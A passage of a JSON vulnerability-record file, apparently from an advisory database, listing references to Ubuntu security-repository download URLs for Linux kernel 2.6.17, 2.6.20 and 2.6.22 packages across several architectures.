        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.43_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-server_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc-smp_2.6.22-14.51_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43.dsc"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-xen_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-doc-2.6.22_2.6.22-14.51_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-rt_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51.dsc"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-server_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-server_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.43_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43.diff.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-sparc64-smp_2.6.22-14.51_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
